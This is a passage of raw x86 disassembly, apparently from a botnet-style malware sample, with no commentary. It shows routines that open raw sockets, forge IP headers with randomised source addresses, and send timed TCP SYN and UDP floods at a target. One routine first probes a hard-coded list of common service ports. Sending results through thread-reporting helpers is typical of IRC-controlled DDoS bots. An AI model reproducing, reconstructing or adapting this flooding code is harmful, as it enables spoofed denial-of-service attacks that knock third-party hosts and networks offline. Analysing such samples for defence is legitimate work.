pop ecx
jz short loc_416D66
call sub_41ECDE
cdq
push 3
pop ecx
idiv ecx
mov [ebp+64h], edx
call sub_41ECDE
push 2
cdq
pop ecx
idiv ecx
neg edx
sbb dl, dl
and dl, 0Eh
add dl, cl
mov [ebp+69h], dl
loc_416D66: ; CODE XREF: seg000:00416D08�j
; seg000:00416D28�j ...
push 200h
mov byte ptr [ebp+68h], 50h
call ds:dword_444260 ; htons
mov [ebp+6Ah], ax
mov eax, [ebp+54h]
mov [ebp+10h], eax
mov eax, [ebp+58h]
push 14h
mov [ebp+6Eh], bx
mov [ebp+6Ch], bx
mov [ebp+14h], eax
mov [ebp+18h], bl
mov byte ptr [ebp+19h], 6
call ds:dword_444260 ; htons
mov [ebp+1Ah], ax
push 20h
lea eax, [ebp+10h]
push eax
lea eax, [ebp-2Ch]
push eax
call sub_41F400
push 14h
lea eax, [ebp+5Ch]
push eax
lea eax, [ebp-0Ch]
push eax
call sub_41F400
lea eax, [ebp-2Ch]
push 34h
push eax
call sub_402422
mov [ebp+6Ch], ax
push 14h
lea eax, [ebp+48h]
push eax
lea eax, [ebp-2Ch]
push eax
call sub_41F400
push 14h
lea eax, [ebp+5Ch]
push eax
lea eax, [ebp-18h]
push eax
call sub_41F400
push 4
lea eax, [ebp-4]
push ebx
push eax
call sub_41E5F0
add esp, 44h
lea eax, [ebp-2Ch]
push 28h
push eax
call sub_402422
mov [ebp+52h], ax
push 14h
lea eax, [ebp+48h]
push eax
lea eax, [ebp-2Ch]
push eax
call sub_41F400
add esp, 14h
push 10h
lea eax, [ebp+30h]
push eax
push ebx
push 3Ch
lea eax, [ebp-2Ch]
push eax
push dword ptr [ebp+70h]
call ds:dword_4440CC ; sendto
cmp eax, 0FFFFFFFFh
jz loc_416ED9
inc dword ptr [ebp+7Ch]
loc_416E3D: ; CODE XREF: seg000:00416C2B�j
call edi ; GetTickCount
sub eax, [ebp+44h]
xor edx, edx
mov ecx, 3E8h
div ecx
cmp eax, [ebp-40h]
jbe loc_416C30
push dword ptr [ebp+70h]
call ds:dword_444218 ; closesocket
mov eax, [ebp+7Ch]
imul eax, 3Ch
mov ecx, eax
shr eax, 0Ah
xor edx, edx
div dword ptr [ebp-40h]
shr ecx, 14h
push ecx
push eax
push dword ptr [ebp+7Ch]
lea eax, [ebp-1C8h]
push eax
lea eax, [ebp-148h]
push eax
lea eax, [ebp-3CCh]
push offset unk_435818
push eax
call sub_41E6A6
add esp, 1Ch
cmp [ebp-34h], ebx
jnz short loc_416EBC
loc_416E9C: ; CODE XREF: seg000:00416BA1�j
push ebx
push dword ptr [ebp-38h]
lea eax, [ebp-3CCh]
push eax
lea eax, [ebp-0C8h]
push eax
push dword ptr [ebp-1CCh]
call sub_40123B
add esp, 14h
loc_416EBC: ; CODE XREF: seg000:00416B9B�j
; seg000:00416E9A�j
lea eax, [ebp-3CCh]
push eax
call sub_417D70
push dword ptr [ebp-48h]
call sub_40B149
pop ecx
pop ecx
push ebx
call ds:dword_42B068 ; ExitThread
loc_416ED9: ; CODE XREF: seg000:00416E34�j
push dword ptr [ebp+70h]
call ds:dword_444218 ; closesocket
call ds:dword_4441C4 ; WSAGetLastError
push eax
push dword ptr [ebp+7Ch]
lea eax, [ebp-1C8h]
push eax
push offset unk_4357C8
lea eax, [ebp-3CCh]
push 200h
push eax
call sub_41E6FE
add esp, 18h
jmp loc_416B98
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416F11 proc near ; CODE XREF: sub_416F65+19A�p
; sub_416F65+207�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov ecx, [ebp+arg_4]
mov edx, [ebp+arg_0]
push esi
xor esi, esi
cmp ecx, 1
mov [ebp+arg_4], esi
jle short loc_416F3F
lea eax, [ecx-2]
shr eax, 1
inc eax
push edi
lea edi, [eax+eax]
sub ecx, edi
loc_416F31: ; CODE XREF: sub_416F11+28�j
movzx edi, word ptr [edx]
add esi, edi
inc edx
inc edx
dec eax
jnz short loc_416F31
pop edi
cmp ecx, 1
loc_416F3F: ; CODE XREF: sub_416F11+12�j
jnz short loc_416F4C
mov al, [edx]
mov byte ptr [ebp+arg_4], al
movzx eax, word ptr [ebp+arg_4]
add esi, eax
loc_416F4C: ; CODE XREF: sub_416F11:loc_416F3F�j
mov ecx, esi
and esi, 0FFFFh
sar ecx, 10h
add ecx, esi
mov eax, ecx
sar eax, 10h
add eax, ecx
not eax
pop esi
pop ebp
retn
sub_416F11 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416F65 proc near ; CODE XREF: seg000:00417210�p
var_D0 = dword ptr -0D0h
var_C8 = byte ptr -0C8h
var_A8 = dword ptr -0A8h
var_A4 = dword ptr -0A4h
var_A0 = byte ptr -0A0h
var_9F = byte ptr -9Fh
var_9E = word ptr -9Eh
var_9C = byte ptr -9Ch
var_88 = byte ptr -88h
var_74 = word ptr -74h
var_72 = word ptr -72h
var_70 = dword ptr -70h
var_64 = byte ptr -64h
var_60 = byte ptr -60h
var_5F = byte ptr -5Fh
var_5E = byte ptr -5Eh
var_54 = dword ptr -54h
var_50 = byte ptr -50h
var_4E = word ptr -4Eh
var_4C = word ptr -4Ch
var_4A = word ptr -4Ah
var_48 = byte ptr -48h
var_47 = byte ptr -47h
var_46 = word ptr -46h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = word ptr -3Ch
var_3A = word ptr -3Ah
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = word ptr -2Ch
var_2A = word ptr -2Ah
var_28 = word ptr -28h
var_24 = byte ptr -24h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_194 = dword ptr 19Ch
arg_198 = dword ptr 1A0h
push ebp
mov ebp, esp
sub esp, 0C8h
and [ebp+var_4], 0
push esi
mov esi, ds:dword_42B038
call esi ; GetTickCount
push 0FFh
push 3
push 2
mov [ebp+var_C], eax
call ds:dword_444100 ; socket
mov [ebp+var_8], eax
call esi ; GetTickCount
push eax
call sub_41ECD4
mov [esp+0D0h+var_D0], 578h
push 9
push 1
call sub_41B325
pop ecx
pop ecx
push eax
lea eax, [ebp+var_24]
push eax
call sub_41E5F0
add esp, 0Ch
call esi ; GetTickCount
sub eax, [ebp+var_C]
xor edx, edx
mov ecx, 3E8h
div ecx
cmp eax, [ebp+arg_198]
ja loc_4171AD
push ebx
push edi
mov edi, 5A0h
loc_416FD8: ; CODE XREF: sub_416F65+240�j
cmp ds:dword_4D5898, 0
jnz short loc_417039
push 10h
pop eax
push eax
mov [ebp+var_10], eax
lea eax, [ebp+var_64]
push 0
push eax
call sub_41E5F0
add esp, 0Ch
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_64]
push eax
push [ebp+arg_0]
call ds:dword_444068 ; getsockname
push 0FFh
push 1
call sub_41B325
push eax
movzx eax, [ebp+var_5E]
push eax
movzx eax, [ebp+var_5F]
push eax
movzx eax, [ebp+var_60]
push eax
lea eax, [ebp+var_C8]
push offset aD_D_D_D ; "%d.%d.%d.%d"
push eax
call sub_41E6A6
add esp, 20h
jmp short loc_41704C
; ---------------------------------------------------------------------------
loc_417039: ; CODE XREF: sub_416F65+7A�j
lea eax, [ebp+var_C8]
push offset dword_4D5698
push eax
call sub_41EEC0
pop ecx
pop ecx
loc_41704C: ; CODE XREF: sub_416F65+D2�j
lea eax, [ebp+var_C8]
push eax
call ds:dword_44417C ; inet_addr
mov ebx, eax
mov eax, [ebp+var_54]
and eax, 0FFFFFF45h
or eax, 45h
push edi
mov [ebp+var_54], eax
mov [ebp+var_50], 10h
call ds:dword_444260 ; htons
mov [ebp+var_4E], ax
call sub_41ECDE
and [ebp+var_46], 0
mov [ebp+var_4C], ax
mov eax, [ebp+arg_194]
mov [ebp+var_4A], 40h
mov [ebp+var_48], 40h
mov [ebp+var_47], 6
mov [ebp+var_44], ebx
mov [ebp+var_40], eax
call sub_41ECDE
mov [ebp+var_3C], ax
call sub_41ECDE
mov [ebp+var_3A], ax
call sub_41ECDE
mov [ebp+var_38], eax
call sub_41ECDE
mov ebx, [ebp+var_40]
and [ebp+var_2A], 0
and [ebp+var_28], 0
mov [ebp+var_34], eax
mov eax, [ebp+var_30]
and ax, 0FF50h
or ax, 50h
mov word ptr [ebp+var_30], ax
mov ax, [ebp+var_3A]
mov [ebp+var_72], ax
lea eax, [ebp+var_54]
push 14h
push eax
mov byte ptr [ebp+var_30+2], 18h
mov [ebp+var_2C], 787Dh
mov [ebp+var_74], 2
mov [ebp+var_70], ebx
call sub_416F11
pop ecx
pop ecx
mov [ebp+var_46], ax
mov eax, [ebp+var_44]
push 58Ch
mov [ebp+var_A8], eax
mov [ebp+var_A4], ebx
mov [ebp+var_A0], 0
mov [ebp+var_9F], 6
call ds:dword_42B200 ; htons
mov [ebp+var_9E], ax
push 14h
lea eax, [ebp+var_9C]
push eax
lea eax, [ebp+var_3C]
push eax
call sub_41F400
push 578h
lea eax, [ebp+var_88]
push eax
lea eax, [ebp+var_24]
push eax
call sub_41F400
lea eax, [ebp+var_A8]
push 598h
push eax
call sub_416F11
add esp, 20h
mov [ebp+var_2A], ax
push 10h
lea eax, [ebp+var_74]
push eax
push 0
push edi
lea eax, [ebp+var_54]
push eax
push [ebp+var_8]
call ds:dword_4440CC ; sendto
inc [ebp+var_4]
call esi ; GetTickCount
sub eax, [ebp+var_C]
xor edx, edx
mov ecx, 3E8h
div ecx
cmp eax, [ebp+arg_198]
jbe loc_416FD8
pop edi
pop ebx
loc_4171AD: ; CODE XREF: sub_416F65+66�j
push [ebp+var_8]
call ds:dword_444218 ; closesocket
mov eax, [ebp+var_4]
pop esi
leave
retn
sub_416F65 endp
; ---------------------------------------------------------------------------
loc_4171BC: ; DATA XREF: sub_40274D+69BB�o
push ebp
mov ebp, esp
sub esp, 394h
mov eax, [ebp+8]
push esi
push edi
push 65h
mov esi, eax
pop ecx
lea edi, [ebp-194h]
rep movsd
mov dword ptr [eax+190h], 1
lea eax, [ebp-110h]
push eax
call sub_41E7AD
pop ecx
push eax
lea eax, [ebp-190h]
push eax
call ds:dword_44417C ; inet_addr
push eax
sub esp, 194h
push 65h
pop ecx
lea esi, [ebp-194h]
mov edi, esp
rep movsd
call sub_416F65
push eax
lea eax, [ebp-394h]
push offset unk_4358F4
push eax
call sub_41E6A6
xor esi, esi
add esp, 1A8h
cmp [ebp-8], esi
jnz short loc_417254
push esi
push dword ptr [ebp-0Ch]
lea eax, [ebp-394h]
push eax
lea eax, [ebp-90h]
push eax
push dword ptr [ebp-194h]
call sub_40123B
add esp, 14h
loc_417254: ; CODE XREF: seg000:00417232�j
lea eax, [ebp-394h]
push eax
call sub_417D70
push dword ptr [ebp-10h]
call sub_40B149
pop ecx
pop ecx
push esi
call ds:dword_42B068 ; ExitThread
int 3 ; Trap to Debugger
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417272 proc near ; CODE XREF: seg000:0041762E�p
var_254 = byte ptr -254h
var_54 = byte ptr -54h
var_34 = byte ptr -34h
var_30 = byte ptr -30h
var_2F = byte ptr -2Fh
var_2E = byte ptr -2Eh
var_24 = word ptr -24h
var_22 = word ptr -22h
var_20 = dword ptr -20h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
arg_84 = byte ptr 8Ch
arg_104 = byte ptr 10Ch
arg_184 = byte ptr 18Ch
arg_208 = dword ptr 210h
arg_20C = dword ptr 214h
push ebp
mov ebp, esp
sub esp, 254h
push ebx
push edi
mov ebx, 0FFh
push ebx
push 3
push 2
call ds:dword_444100 ; socket
cmp eax, 0FFFFFFFFh
mov [ebp+var_C], eax
jnz short loc_4172AC
lea eax, [ebp+var_254]
push offset unk_435AE0
push eax
call sub_41E6A6
pop ecx
pop ecx
xor edi, edi
jmp short loc_417302
; ---------------------------------------------------------------------------
loc_4172AC: ; CODE XREF: sub_417272+21�j
push 4
lea ecx, [ebp+var_14]
push ecx
push 2
xor edi, edi
push edi
push eax
mov [ebp+var_14], 1
call ds:dword_444120 ; setsockopt
cmp eax, 0FFFFFFFFh
jnz short loc_4172D8
call ds:dword_4441C4 ; WSAGetLastError
push eax
push offset unk_435A90
jmp short loc_4172F3
; ---------------------------------------------------------------------------
loc_4172D8: ; CODE XREF: sub_417272+56�j
lea eax, [ebp+arg_4]
push eax
call ds:dword_44417C ; inet_addr
cmp eax, 0FFFFFFFFh
jnz short loc_417333
call ds:dword_4441C4 ; WSAGetLastError
push eax
push offset unk_435A48
loc_4172F3: ; CODE XREF: sub_417272+64�j
lea eax, [ebp+var_254]
push eax
call sub_41E6A6
add esp, 0Ch
loc_417302: ; CODE XREF: sub_417272+38�j
cmp [ebp+arg_20C], edi
jnz loc_4175C8
push edi
push [ebp+arg_208]
lea eax, [ebp+var_254]
push eax
lea eax, [ebp+arg_184]
push eax
push [ebp+arg_0]
call sub_40123B
add esp, 14h
jmp loc_4175C8
; ---------------------------------------------------------------------------
loc_417333: ; CODE XREF: sub_417272+73�j
push esi
push edi
mov [ebp+var_24], 2
call ds:dword_444260 ; htons
mov [ebp+var_22], ax
lea eax, [ebp+arg_4]
push eax
call ds:dword_42B218 ; inet_addr
mov esi, ds:dword_42B038
mov [ebp+var_20], eax
call esi ; GetTickCount
mov [ebp+var_8], eax
lea eax, [ebp+arg_4]
push eax
lea eax, [ebp+var_254]
push offset unk_435A1C
push eax
call sub_41E6A6
add esp, 0Ch
cmp [ebp+arg_20C], edi
jnz short loc_41739D
push edi
push [ebp+arg_208]
lea eax, [ebp+var_254]
push eax
lea eax, [ebp+arg_184]
push eax
push [ebp+arg_0]
call sub_40123B
add esp, 14h
loc_41739D: ; CODE XREF: sub_417272+109�j
mov [ebp+var_4], edi
call esi ; GetTickCount
sub eax, [ebp+var_8]
xor edx, edx
mov ecx, 3E8h
div ecx
mov esi, eax
lea eax, [ebp+arg_104]
push eax
call sub_41E7AD
cmp esi, eax
pop ecx
ja loc_417556
mov esi, 41Ch
jmp short loc_4173D1
; ---------------------------------------------------------------------------
loc_4173CC: ; CODE XREF: sub_417272+2DE�j
mov ebx, 0FFh
loc_4173D1: ; CODE XREF: sub_417272+158�j
cmp ds:dword_4D5898, edi
jnz short loc_417429
push 10h
pop eax
push eax
mov [ebp+var_10], eax
lea eax, [ebp+var_34]
push edi
push eax
call sub_41E5F0
add esp, 0Ch
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_34]
push eax
push [ebp+arg_0]
call ds:dword_444068 ; getsockname
push ebx
push 1
call sub_41B325
push eax
movzx eax, [ebp+var_2E]
push eax
movzx eax, [ebp+var_2F]
push eax
movzx eax, [ebp+var_30]
push eax
lea eax, [ebp+var_54]
push offset aD_D_D_D ; "%d.%d.%d.%d"
push eax
call sub_41E6A6
add esp, 20h
jmp short loc_417439
; ---------------------------------------------------------------------------
loc_417429: ; CODE XREF: sub_417272+165�j
lea eax, [ebp+var_54]
push offset dword_4D5698
push eax
call sub_41EEC0
pop ecx
pop ecx
loc_417439: ; CODE XREF: sub_417272+1B5�j
push esi
mov ds:byte_4D58A0, 45h
call ds:dword_444260 ; htons
mov ds:word_4D58A2, ax
lea eax, [ebp+var_54]
push eax
mov ds:word_4D58A4, 1
mov ds:word_4D58A6, di
mov ds:byte_4D58A8, 80h
mov ds:byte_4D58A9, 11h
mov ds:word_4D58AA, di
call ds:dword_44417C ; inet_addr
mov ds:dword_4D58AC, eax
mov eax, [ebp+var_20]
mov ds:dword_4D58B0, eax
lea eax, [ebp+arg_84]
push eax
mov ds:word_4D58BA, di
call sub_41E7AD
test eax, eax
pop ecx
jnz short loc_4174B1
call sub_41ECDE
cdq
mov ecx, 401h
idiv ecx
push edx
jmp short loc_4174BF
; ---------------------------------------------------------------------------
loc_4174B1: ; CODE XREF: sub_417272+22D�j
lea eax, [ebp+arg_84]
push eax
call sub_41E7AD
pop ecx
push eax
loc_4174BF: ; CODE XREF: sub_417272+23D�j
call ds:dword_444260 ; htons
mov ds:word_4D58B6, ax
call sub_41ECDE
cdq
mov ecx, 401h
idiv ecx
push 408h
mov ds:word_4D58B4, dx
call ds:dword_444260 ; htons
push 400h
mov ds:word_4D58B8, ax
call sub_41ECDE
cdq
idiv ebx
push edx
push offset dword_4D58BC
call sub_41E5F0
add esp, 0Ch
push 10h
lea eax, [ebp+var_24]
push eax
push edi
push esi
push offset byte_4D58A0
push [ebp+var_C]
call ds:dword_4440CC ; sendto
cmp eax, 0FFFFFFFFh
jz loc_4175CE
inc [ebp+var_4]
call ds:dword_42B038 ; GetTickCount
sub eax, [ebp+var_8]
xor edx, edx
mov ecx, 3E8h
div ecx
mov ebx, eax
lea eax, [ebp+arg_104]
push eax
call sub_41E7AD
cmp ebx, eax
pop ecx
jbe loc_4173CC
loc_417556: ; CODE XREF: sub_417272+14D�j
push [ebp+var_C]
call ds:dword_444218 ; closesocket
mov esi, [ebp+var_4]
lea eax, [ebp+arg_104]
imul esi, 41Ch
push eax
call sub_41E7AD
mov ecx, eax
mov eax, esi
shr eax, 0Ah
xor edx, edx
div ecx
shr esi, 14h
push eax
push esi
push [ebp+var_4]
lea eax, [ebp+arg_4]
push eax
lea eax, [ebp+var_254]
push offset unk_4359B8
push eax
call sub_41E6A6
add esp, 1Ch
loc_41759F: ; CODE XREF: sub_417272+37F�j
cmp [ebp+arg_20C], edi
jnz short loc_4175C7
push edi
push [ebp+arg_208]
lea eax, [ebp+var_254]
push eax
lea eax, [ebp+arg_184]
push eax
push [ebp+arg_0]
call sub_40123B
add esp, 14h
loc_4175C7: ; CODE XREF: sub_417272+333�j
pop esi
loc_4175C8: ; CODE XREF: sub_417272+96�j
; sub_417272+BC�j
pop edi
xor eax, eax
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_4175CE: ; CODE XREF: sub_417272+2B2�j
push [ebp+var_4]
push esi
call ds:dword_4441C4 ; WSAGetLastError
push eax
lea eax, [ebp+arg_4]
push eax
lea eax, [ebp+var_254]
push offset unk_435928
push eax
call sub_41E6A6
add esp, 18h
jmp short loc_41759F
sub_417272 endp
; ---------------------------------------------------------------------------
loc_4175F3: ; DATA XREF: sub_40274D+4A49�o
push ebp
mov ebp, esp
sub esp, 414h
mov edx, [ebp+8]
push esi
push edi
mov eax, 85h
mov ecx, eax
mov esi, edx
lea edi, [ebp-214h]
rep movsd
sub esp, 214h
mov ecx, eax
lea esi, [ebp-214h]
mov edi, esp
mov dword ptr [edx+210h], 1
rep movsd
call sub_417272
push eax
lea eax, [ebp-414h]
push offset unk_435B0C
push eax
call sub_41E6A6
lea eax, [ebp-414h]
add esp, 220h
push eax
call sub_417D70
push dword ptr [ebp-10h]
call sub_40B149
pop ecx
pop ecx
push 0
call ds:dword_42B068 ; ExitThread
int 3 ; Trap to Debugger
; =============== S U B R O U T I N E =======================================
sub_41766A proc near ; CODE XREF: sub_41776E+289�p
arg_0 = dword ptr 4
push 0FFFEh
push 1
call sub_41B325
pop ecx
pop ecx
mov ecx, [esp+arg_0]
shl eax, 10h
and ecx, 0FFFFh
or eax, ecx
retn
sub_41766A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417688 proc near ; CODE XREF: sub_41776E+178�p
var_214 = dword ptr -214h
var_210 = dword ptr -210h
var_110 = dword ptr -110h
var_10C = dword ptr -10Ch
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 214h
and [ebp+var_4], 0
cmp [ebp+arg_C], 0
jnz short loc_4176AC
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_42B1F4 ; connect
leave
retn
; ---------------------------------------------------------------------------
loc_4176AC: ; CODE XREF: sub_417688+11�j
push esi
mov esi, [ebp+arg_0]
push edi
lea eax, [ebp+var_C]
push eax
xor edi, edi
push 8004667Eh
inc edi
push esi
mov [ebp+var_C], edi
call ds:dword_42B1E4 ; ioctlsocket
push [ebp+arg_8]
push [ebp+arg_4]
push esi
call ds:dword_4440AC ; connect
push [ebp+arg_C]
lea eax, [ebp+var_214]
push 0
push eax
lea eax, [ebp+var_110]
push eax
lea eax, [esi+1]
push eax
mov [ebp+var_10C], esi
mov [ebp+var_110], edi
mov [ebp+var_210], esi
mov [ebp+var_214], edi
call ds:dword_4441B0 ; select
test eax, eax
jnz short loc_417712
or eax, 0FFFFFFFFh
jmp short loc_41776A
; ---------------------------------------------------------------------------
loc_417712: ; CODE XREF: sub_417688+83�j
or edi, 0FFFFFFFFh
cmp eax, edi
jz short loc_41775F
lea eax, [ebp+var_110]
push eax
push esi
call sub_4298D6 ; __WSAFDIsSet
test eax, eax
jnz short loc_41773B
lea eax, [ebp+var_214]
push eax
push esi
call sub_4298D6 ; __WSAFDIsSet
test eax, eax
jz short loc_41775F
loc_41773B: ; CODE XREF: sub_417688+A0�j
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_4]
push eax
push 1007h
push 0FFFFh
push esi
mov [ebp+var_8], 4
call ds:dword_42B1D4 ; getsockopt
cmp eax, edi
jnz short loc_417763
loc_41775F: ; CODE XREF: sub_417688+8F�j
; sub_417688+B1�j
mov eax, edi
jmp short loc_41776A
; ---------------------------------------------------------------------------
loc_417763: ; CODE XREF: sub_417688+D5�j
mov eax, [ebp+var_4]
neg eax
sbb eax, eax
loc_41776A: ; CODE XREF: sub_417688+88�j
; sub_417688+D9�j
pop edi
pop esi
leave
retn
sub_417688 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=6Ch
sub_41776E proc near ; CODE XREF: seg000:00417C19�p
var_10C = dword ptr -10Ch
var_108 = dword ptr -108h
var_104 = dword ptr -104h
var_100 = byte ptr -100h
var_9C = word ptr -9Ch
var_9A = word ptr -9Ah
var_98 = dword ptr -98h
var_8C = dword ptr -8Ch
var_88 = dword ptr -88h
var_84 = dword ptr -84h
var_80 = dword ptr -80h
var_7C = dword ptr -7Ch
var_78 = dword ptr -78h
var_74 = dword ptr -74h
var_70 = dword ptr -70h
var_6C = dword ptr -6Ch
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
lea ebp, [esp-6Ch]
sub esp, 10Ch
push ebx
push esi
push edi
xor esi, esi
inc esi
push esi
xor ebx, ebx
push ebx
push ebx
push 0FFh
push 3
push 2
mov [ebp+6Ch+var_14], esi
call ds:dword_42B1D0 ; WSASocketA
push 4
lea ecx, [ebp+6Ch+var_14]
push ecx
push 2
push ebx
push eax
mov ds:dword_4D5D20, eax
call ds:dword_444120 ; setsockopt
call ds:dword_42B038 ; GetTickCount
push eax
call sub_41ECD4
pop ecx
push 19h
pop ecx
xor eax, eax
lea edi, [ebp+6Ch+var_100]
mov [ebp+6Ch+var_7C], ecx
mov [ebp+6Ch+var_10C], ebx
mov [ebp+6Ch+var_108], ebx
mov [ebp+6Ch+var_104], ebx
mov [ebp+6Ch+var_8C], 401h
mov [ebp+6Ch+var_88], 15h
mov [ebp+6Ch+var_84], 16h
mov [ebp+6Ch+var_80], 17h
mov [ebp+6Ch+var_78], 35h
mov [ebp+6Ch+var_74], 50h
mov [ebp+6Ch+var_70], 51h
mov [ebp+6Ch+var_6C], 58h
mov [ebp+6Ch+var_68], 6Eh
mov [ebp+6Ch+var_64], 71h
mov [ebp+6Ch+var_60], 77h
mov [ebp+6Ch+var_5C], 87h
mov [ebp+6Ch+var_58], 89h
mov [ebp+6Ch+var_54], 8Bh
mov [ebp+6Ch+var_50], 8Fh
mov [ebp+6Ch+var_4C], 1BBh
mov [ebp+6Ch+var_48], 1BDh
mov [ebp+6Ch+var_44], 400h
mov [ebp+6Ch+var_40], 599h
mov [ebp+6Ch+var_3C], 5DCh
mov [ebp+6Ch+var_38], 6B8h
mov [ebp+6Ch+var_34], 0CEAh
mov [ebp+6Ch+var_30], 0D3Dh
mov [ebp+6Ch+var_2C], 1388h
mov [ebp+6Ch+var_28], 1A0Bh
mov [ebp+6Ch+var_24], 1F40h
mov [ebp+6Ch+var_20], 1F90h
rep stosd
mov [ebp+6Ch+var_C], ebx
mov [ebp+6Ch+var_1C], 3
mov [ebp+6Ch+var_18], 0BB8h
mov [ebp+6Ch+var_4], ebx
loc_4178AB: ; CODE XREF: sub_41776E+1A5�j
mov eax, [ebp+6Ch+arg_0]
mov edi, [ebp+6Ch+var_4]
mov [ebp+6Ch+var_98], eax
xor eax, eax
lea edi, [ebp+edi+6Ch+var_8C]
mov ax, [edi]
mov [ebp+6Ch+var_9C], 2
push eax
call ds:dword_444260 ; htons
push ebx
push esi
push 2
mov [ebp+6Ch+var_9A], ax
call ds:dword_444100 ; socket
lea ecx, [ebp+6Ch+var_1C]
push ecx
push 10h
lea ecx, [ebp+6Ch+var_9C]
push ecx
push eax
mov [ebp+6Ch+var_8], eax
call sub_417688
add esp, 10h
push [ebp+6Ch+var_8]
mov [ebp+6Ch+var_10], eax
call ds:dword_444218 ; closesocket
cmp [ebp+6Ch+var_10], ebx
jnz short loc_41790B
mov eax, [edi]
mov ecx, [ebp+6Ch+var_4]
mov [ebp+ecx+6Ch+var_10C], eax
loc_41790B: ; CODE XREF: sub_41776E+18F�j
add [ebp+6Ch+var_4], 4
cmp [ebp+6Ch+var_4], 70h
jl short loc_4178AB
push offset asc_42FCE0 ; " "
mov esi, offset dword_4D5D28
push esi
call sub_41E6A6
mov edi, ds:dword_42B038
pop ecx
pop ecx
call edi ; GetTickCount
mov [ebp+6Ch+var_8], eax
mov [ebp+6Ch+var_4], ebx
loc_417935: ; CODE XREF: sub_41776E+21E�j
call edi ; GetTickCount
sub eax, [ebp+6Ch+var_8]
xor edx, edx
mov ecx, 3E8h
div ecx
cmp eax, [ebp+6Ch+arg_4]
ja short loc_41798E
mov eax, [ebp+6Ch+var_4]
mov eax, [ebp+eax*4+6Ch+var_10C]
cmp eax, ebx
jz short loc_41796B
push eax
push esi
push offset aSD ; "%s%d "
push esi
mov [ebp+6Ch+var_C], eax
call sub_41E6A6
add esp, 10h
jmp short loc_417985
; ---------------------------------------------------------------------------
loc_41796B: ; CODE XREF: sub_41776E+1E6�j
push 0FFFFh
push ebx
call sub_41B325
pop ecx
pop ecx
push eax
call ds:dword_444260 ; htons
movzx eax, ax
mov [ebp+6Ch+var_C], eax
loc_417985: ; CODE XREF: sub_41776E+1FB�j
inc [ebp+6Ch+var_4]
cmp [ebp+6Ch+var_4], 1Ch
jl short loc_417935
loc_41798E: ; CODE XREF: sub_41776E+1D8�j
; sub_41776E+448�j
push 28h
push ebx
push offset byte_4D5CE0
call sub_41E5F0
mov esi, 0FFFFh
push esi
push 400h
mov ds:byte_4D5CE0, 45h
mov ds:byte_4D5CE9, 6
mov ds:byte_4D5CE1, 8
call sub_41B325
add esp, 14h
push eax
call ds:dword_444260 ; htons
push 28h
mov ds:word_4D5CE4, ax
call ds:dword_444260 ; htons
cmp ds:dword_4D5898, ebx
mov ds:word_4D5CE2, ax
mov ds:word_4D5CE6, bx
mov ds:byte_4D5CE8, 0FFh
jnz short loc_4179FF
push [ebp+6Ch+arg_0]
call sub_41766A
pop ecx
jmp short loc_417A0A
; ---------------------------------------------------------------------------
loc_4179FF: ; CODE XREF: sub_41776E+284�j
push offset dword_4D5698
call ds:dword_44417C ; inet_addr
loc_417A0A: ; CODE XREF: sub_41776E+28F�j
mov ds:dword_4D5CEC, eax
mov eax, [ebp+6Ch+arg_0]
push 4000h
mov ds:dword_4D5CF0, eax
mov ds:byte_4D5D01, bl
call ds:dword_444260 ; htons
push esi
push ebx
mov ds:word_4D5D02, ax
call sub_41B325
mov edi, eax
push esi
push ebx
shl edi, 8
call sub_41B325
add esp, 10h
add edi, eax
push edi
call ds:dword_444234 ; htonl
mov edi, [ebp+6Ch+arg_0]
mov ds:dword_4D5CF8, eax
mov al, ds:byte_4D5D00
and al, 0Fh
or al, 50h
mov ds:byte_4D5D00, al
mov ax, word ptr [ebp+6Ch+var_C]
push 14h
mov ds:dword_4D5CFC, ebx
mov ds:word_4D5D06, bx
mov ds:word_4D5CF6, ax
mov ds:dword_4D5CC0, edi
mov ds:byte_4D5CC4, bl
mov ds:byte_4D5CC5, 6
call ds:dword_444260 ; htons
mov ds:word_4D5CC6, ax
mov ax, ds:word_4D5CF6
mov ds:word_4D5D0C, 2
mov ds:dword_4D5D10, edi
mov ds:word_4D5D0E, ax
mov [ebp+6Ch+var_4], ebx
jmp short loc_417AC0
; ---------------------------------------------------------------------------
loc_417ABB: ; CODE XREF: sub_41776E+422�j
mov esi, 0FFFFh
loc_417AC0: ; CODE XREF: sub_41776E+34B�j
cmp [ebp+6Ch+var_4], ebx
push esi
push ebx
